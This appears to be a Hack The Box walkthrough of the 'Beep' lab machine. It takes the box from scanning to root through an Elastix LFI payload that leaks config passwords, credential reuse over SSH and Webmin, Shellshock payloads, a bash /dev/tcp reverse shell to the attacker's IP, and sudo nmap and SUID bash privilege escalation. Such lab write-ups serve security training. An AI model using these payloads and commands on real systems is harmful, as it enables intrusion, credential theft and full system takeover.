Beep

Beep HTB walkthrough 2023 tested on Kali. Beep has a very large list of running services, which can make it a bit challenging to find the correct entry method.

Scanning

Scanning reveals a no of ports to be opened

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sS -sC -sV -O -T4 10.10.10.7 -oX beep.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-19 08:28 EDT
Nmap scan report for 10.10.10.7
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 adee5abb6937fb27afb83072a0f96f53 (DSA)
|_  2048 bcc6735913a18a4b550750f6651d6d0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: AUTH-RESP-CODE APOP UIDL PIPELINING TOP IMPLEMENTATION(Cyrus POP3 server v2) RESP-CODES LOGIN-DELAY(0) USER EXPIRE(NEVER) STLS
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            875/udp   status
|_  100024  1            878/tcp   status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: Completed UIDPLUS STARTTLS X-NETSCAPE LITERAL+ BINARY ACL CHILDREN URLAUTHA0001 LISTEXT OK IMAP4 ANNOTATEMORE THREAD=REFERENCES NO RIGHTS=kxte MAILBOX-REFERRALS CONDSTORE CATENATE LIST-SUBSCRIBED ID THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE QUOTA SORT MULTIAPPEND ATOMIC SORT=MODSEQ NAMESPACE UNSELECT RENAME
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
|_ssl-date: 2023-07-19T12:32:31+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/19%OT=22%CT=1%CU=35489%PV=Y%DS=2%DC=I%G=Y%TM=64B7D8A
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=C9%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11N
OS:W7%O6=M53CST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M53CNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M53CST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.44 seconds

Web Enumeration

Both port 80 and 443 are aval and apache is running on both ports. We, also got the domain name. so add it to /etc/hosts

Visiting the site on HTTP, we are redirected to https but the TLS version of the site is low and Firefox gives us an error

Now open the config settings and in new tab, enter the following

about:config

Search for security.tls.version.min and change it to 1.

Now browse again and we get the main Elastix page. Visiting robots.txt, sitemap and source code does not reveal anything. Lets try dirbusting.

ffuf didn't work for some reason. Gobuster saved the day and found a few directories

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u https://beep.localdomain/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -k -t 50
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://beep.localdomain/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/19 09:25:32 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 322] [--> https://beep.localdomain/images/]
/help                 (Status: 301) [Size: 320] [--> https://beep.localdomain/help/]
/themes               (Status: 301) [Size: 322] [--> https://beep.localdomain/themes/]
/modules              (Status: 301) [Size: 323] [--> https://beep.localdomain/modules/]
/mail                 (Status: 301) [Size: 320] [--> https://beep.localdomain/mail/]
/admin                (Status: 301) [Size: 321] [--> https://beep.localdomain/admin/]
/static               (Status: 301) [Size: 322] [--> https://beep.localdomain/static/]
/lang                 (Status: 301) [Size: 320] [--> https://beep.localdomain/lang/]

Now try login to the admin

We get an error page indicating the version of free PBX 2.8.1.4.

Web exploitation with LFI

Now lets search for vulnerability.

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit Elastix
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                       |  Path
------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                                | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                              | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                        | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                     | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                                    | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                                   | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                               | php/webapps/18650.py
------------------------------------------------------------------------------------------------------------------------------------- --------------------------------

So, we will target first LFI

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit -m php/webapps/37637.pl
  Exploit: Elastix 2.2.0 - 'graph.php' Local File Inclusion
      URL: https://www.exploit-db.com/exploits/37637
     Path: /usr/share/exploitdb/exploits/php/webapps/37637.pl
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/Desktop/37637.pl

Opening it, we get the LFI address

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Now paste it in browser and see if we get the config file. And we get the file

Now press ctrl+u to see the source code. And we get a number of passwords.

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE

Lets try enumerating users with reading etc/passwd file

We got a number of users. (Only users with bin/bash are important.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Sorry! Attempt to access restricted file.

Getting Access with SSH

As ssh was open let's try ssh with found users and passwords. We will get the error due to old version of ssh. Add the following to /etc/ssh/ssh_config

HostKeyAlgorithms = +ssh-rsa
PubkeyAcceptedAlgorithms = +ssh-rsa

Now use the following command to ssh

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 [email protected]

use the password " jEhdIekWmdjE" and we are in. We are already root.

We got the flags.

Method 2

Webmin is running on port 10000 which allows full access of the machine. Trying the username root with the passwords I collected from the LFI, I can login to webmin with root / jEhdIekWmdjE. This interface is designed to administer the machine and has full root access.

We can also change passwords

We can also schedule any command. Lets schedule a reverse shell command as local user

And we get the reverse shell

We could have got shell as root user as well if we want.

Method 3 - Exploiting Shell Shock

From Webmin login panel, initiate a login request and intercept it in burp. Forward it to the repeater.

Now change the user agent to shell shock and try following payloads.

() { :; };/bin/echo heloo
() { :; }; sleep 10   (did work some kind of blind shell shock)

Now check ping

() { :; };ping -c 1 10.10.14.108
on our machine
sudo tcpdump -i tun0 -v

And we get the ping. So lets try reverse shell.

sh -i >& /dev/tcp/10.10.14.108/9001 0>&1

And we got the shell.

Method 4 RCE Elastix

Searching with searchsploit had revealed a RCE vulnerability.

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit elastix                
--------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                     |  Path
--------------------------------------------------------------------------------------------------- ---------------------------------
Elastix - 'page' Cross-Site Scripting                                                              | php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                            | php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                      | php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                   | php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                  | php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                 | php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                             | php/webapps/18650.py

Download last script

searchsploit -m php/webapps/18650.py

We need to know a valid SIP extension, so use the following tool to scan for valid extensions.

                                                                                                                                                                       
┌──(kali㉿kali)-[~/Desktop]
└─$ svwar -m INVITE -e100-999 10.10.10.7
WARNING:TakeASip:using an INVITE scan on an endpoint (i.e. SIP phone) may cause it to ring and wake up people in the middle of the night

+-----------+----------------+
| Extension | Authentication |
+===========+================+
| 233       | reqauth        |
+-----------+----------------+

So, we have a valid extension, make necessry changes in the script and open the listener on port 443.

Now, run the script and we get the shell.

Priv Escalation

Now run sudo -l to view commands that can be run as sudo

bash-3.2$ sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
bash-3.2$

Use GTFO bins as a ref

Nmap priv esc

sudo nmap --interactive
nmap> !sh

chmod on root directory

Run the following command to give everyone rwx permissions on the /root directory.

sudo chmod o+rwx /root

chmod /bin/bash add suid permissions

chmod jumps out right away. I’ll pick a file, like /bin/bash, and set it to SUID:

bash-3.2$ ls -l /bin/bash
-rwxr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash
bash-3.2$ sudo chmod 4755 /bin/bash
bash-3.2$ ls -l /bin/bash
-rwsr-xr-x 1 root root 729292 Jan 22  2009 /bin/bash

Now just run it (with -p to not drop privs) and get a root shell:

bash-3.2$ bash -p
bash-3.2# id
uid=100(asterisk) gid=101(asterisk) euid=0(root)

PreviousHTB NextActive

Last updated 2 years ago